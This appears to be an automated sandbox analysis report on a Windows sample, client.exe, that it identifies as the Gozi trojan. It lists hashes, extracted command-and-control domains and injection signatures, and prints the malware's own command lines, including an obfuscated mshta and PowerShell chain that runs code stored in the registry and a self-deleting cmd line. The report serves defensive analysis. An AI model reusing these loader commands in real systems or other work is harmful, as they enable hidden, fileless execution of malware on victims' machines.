Analysis
  max time kernel: 150s
  max time network: 123s
  platform: windows7_x64
  resource: win7-20230831-en
  resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  submitted: 05-10-2023 10:04
  Static task: static1
  Behavioral task: behavioral1
  Sample: client.exe
  Resource: win7-20230831-en
General
  Target: client.exe
  Size: 304KB
  MD5: 27b1d878636e00e43436184b70e9f41c
  SHA1: b175d86922e1e837d8d74b588ff746ea7b8670df
  SHA256: fe05e50be407f5efcb1870991f86ec721fd7088e92782a60aa815e0a68eb486e
  SHA512: 086b34070946d275ef50552969c6e561349299eb7eece513ca4504c84ad7810a02428a1540ecd715541139f500137209c94297a331dfa87c18afa2d91e24349e
  SSDEEP: 6144:R+91vEOpa6NK56upTHirwtRinshvjxdyhgAw8Fi5r+IxsN+:8Dsf4K56u1HqLshvjxia8Mr+/
Malware Config
  Extracted: gozi
    5050
    mifrutty.com
    base_path: /jerry/
    build: 250260
    exe_type: loader
    extension: .bob
    server_id: 50
  Extracted: gozi
    5050
    mifrutty.com
    systemcheck.top
    base_path: /pictures/
    build: 250260
    exe_type: worker
    extension: .bob
    server_id: 50
Signatures
  Dave packer 1 IoCs
    Detects executable using a packer named 'Dave' by the community, based on a string at the end.
    resource: behavioral1/memory/2084-0-0x0000000000100000-0x000000000010C000-memory.dmp  yara_rule: dave
  Deletes itself 1 IoCs
    process: 1296 cmd.exe
  Drops file in System32 directory 1 IoCs
    process: powershell.exe  description: File opened for modification  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  Suspicious use of SetThreadContext 4 IoCs
    PID 1128 powershell.exe set thread context of 1192 Explorer.EXE
    PID 1192 Explorer.EXE set thread context of 1296 cmd.exe
    PID 1296 cmd.exe set thread context of 1148 PING.EXE
    PID 1192 Explorer.EXE set thread context of 2576 cmd.exe
  Enumerates physical storage devices 1 TTPs
    Attempts to interact with connected storage/optical drive(s).
  Modifies Internet Explorer settings 1 IoCs
    process: mshta.exe  description: Key created  ioc: \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main
  Runs ping.exe 1 TTPs 1 IoCs
  Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
    process: 1148 PING.EXE
  Suspicious behavior: EnumeratesProcesses 64 IoCs
    processes: 2084 client.exe, 1128 powershell.exe, 1192 Explorer.EXE (all remaining entries are 1192 Explorer.EXE)
  Suspicious behavior: GetForegroundWindowSpam 1 IoCs
    process: 1192 Explorer.EXE
  Suspicious behavior: MapViewOfSection 4 IoCs
    processes: 1128 powershell.exe, 1192 Explorer.EXE, 1296 cmd.exe, 1192 Explorer.EXE
  Suspicious use of AdjustPrivilegeToken 1 IoCs
    process: 1128 powershell.exe  Token: SeDebugPrivilege
  Suspicious use of SetWindowsHookEx 1 IoCs
    process: 1192 Explorer.EXE
  Suspicious use of WriteProcessMemory 37 IoCs
    PID 2024 mshta.exe wrote to memory of 1128 powershell.exe (3 entries)
    PID 1128 powershell.exe wrote to memory of 1824 csc.exe (3 entries)
    PID 1824 csc.exe wrote to memory of 744 cvtres.exe (3 entries)
    PID 1128 powershell.exe wrote to memory of 2788 csc.exe (3 entries)
    PID 2788 csc.exe wrote to memory of 1248 cvtres.exe (3 entries)
    PID 1128 powershell.exe wrote to memory of 1192 Explorer.EXE (3 entries)
    PID 1192 Explorer.EXE wrote to memory of 1296 cmd.exe (6 entries)
    PID 1296 cmd.exe wrote to memory of 1148 PING.EXE (6 entries)
    PID 1192 Explorer.EXE wrote to memory of 2576 cmd.exe (7 entries)
Processes
  C:\Windows\Explorer.EXE (PID:1192)
    command line: C:\Windows\Explorer.EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\client.exe (PID:2084)
      command line: "C:\Users\Admin\AppData\Local\Temp\client.exe"
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\mshta.exe (PID:2024)
      command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bat1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bat1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3C64491B-6BF2-CEE4-D530-CFE2D9647336\\\MusicWhite'));if(!window.flag)close()</script>"
      - Modifies Internet Explorer settings
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:1128)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name hnouomb -value gp; new-alias -name okdfsimvoc -value iex; okdfsimvoc ([System.Text.Encoding]::ASCII.GetString((hnouomb "HKCU:Software\AppDataLow\Software\Microsoft\3C64491B-6BF2-CEE4-D530-CFE2D9647336").ControlText))
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (PID:1824)
          command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q-jz-g0e.cmdline"
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (PID:744)
            command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C20.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2C10.tmp"
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (PID:2788)
          command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ezf6vonx.cmdline"
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (PID:1248)
            command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CAD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2CAC.tmp"
    C:\Windows\System32\cmd.exe (PID:1296)
      command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
      - Deletes itself
      - Suspicious use of SetThreadContext
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\PING.EXE (PID:1148)
        command line: ping localhost -n 5
        - Runs ping.exe
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
    C:\Windows\syswow64\cmd.exe (PID:2576)
      command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Network
MITRE ATT&CK Enterprise v15
Downloads